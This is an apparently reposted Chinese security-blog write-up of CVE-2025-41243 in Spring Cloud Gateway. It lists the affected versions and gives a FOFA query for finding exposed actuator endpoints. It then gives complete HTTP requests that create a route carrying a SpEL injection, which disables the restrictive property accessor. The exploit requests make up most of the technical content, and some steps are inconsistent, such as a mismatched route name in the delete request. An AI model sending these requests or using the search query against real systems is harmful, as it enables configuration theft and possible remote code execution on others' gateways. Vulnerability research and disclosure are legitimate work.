文章总结: SpringCloudGateway存在CVE-2025-41243漏洞,攻击者可通过访问systemPropertiesBean篡改配置属性关闭网关限制模式,进而访问敏感Bean导致配置信息泄露,特定条件下可能实现远程代码执行,影响4.0.0至4.3.x及3.1.0版本,可通过创建特定路由并修改环境配置为false来利用此漏洞
综合评分: 85
文章分类: 漏洞分析,漏洞预警,WEB安全,应用安全,安全大事件
【已复现】CVE-2025-41243
原创
zz
星络安全实验室
2025年10月3日 01:38
中国香港
1、 产品描述:
Spring Cloud Gateway 是 Spring 生态系统中的核心组件,为构建基于 Spring WebFlux 的 API 网关提供了完整的解决方案。它旨在提供简单、高效的 API 路由,并集成了安全、监控与弹性等关键特性。
2 、漏洞描述:
攻击者可通过访问系统中注册的 @systemProperties Bean,篡改关键配置属性,从而关闭网关的限制性模式。一旦绕过该限制,攻击者将能够进一步访问 @environment 等敏感 Bean,导致应用程序配置信息泄露。在特定条件下,攻击者甚至可能利用此漏洞实现远程代码执行,相当于获取了对系统配置的完全控制权,严重威胁系统安全性。
3、影响版本
Spring Cloud Gateway 4.3.0 – 4.3.x
Spring Cloud Gateway 4.2.0 – 4.2.x
Spring Cloud Gateway 4.1.0 – 4.1.x
Spring Cloud Gateway 4.0.0 – 4.0.x
Spring Cloud Gateway 3.1.0 – 3.1.x
更早的不受支持版本同样受到影响
4、fofa检索语句
body="actuator/gateway"
创建路由并修改环境配置为”false”:
POST /actuator/gateway/routes/test_zz HTTP/1.1
Host: xx
Content-Length: 511
Content-Type: application/json
{
"predicates": [
{
"name": "Path",
"args": {
"_genkey_0": "/actuators/test33"
}
}
],
"filters": [
{
"name": "Path",
"args": {
"_genkey_0": "/test33",
"_genkey_1": " #{ @systemProperties['spring.cloud.gateway.restrictive-property-accessor.enabled'] = false}"
}
}
],
"uri": "http://example.com",
"order": -1
}
刷新路由
GET /actuator/gateway/routes/test_zz HTTP/1.1
Host: xx
访问创建的路由
GET /actuator/gateway/routes/test_zz HTTP/1.1
Host: xx
点到为止,删除路由
DELETE /actuator/gateway/routes/test_c HTTP/1.1
Host:xx
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:星络安全实验室 zz《【已复现】CVE-2025-41243》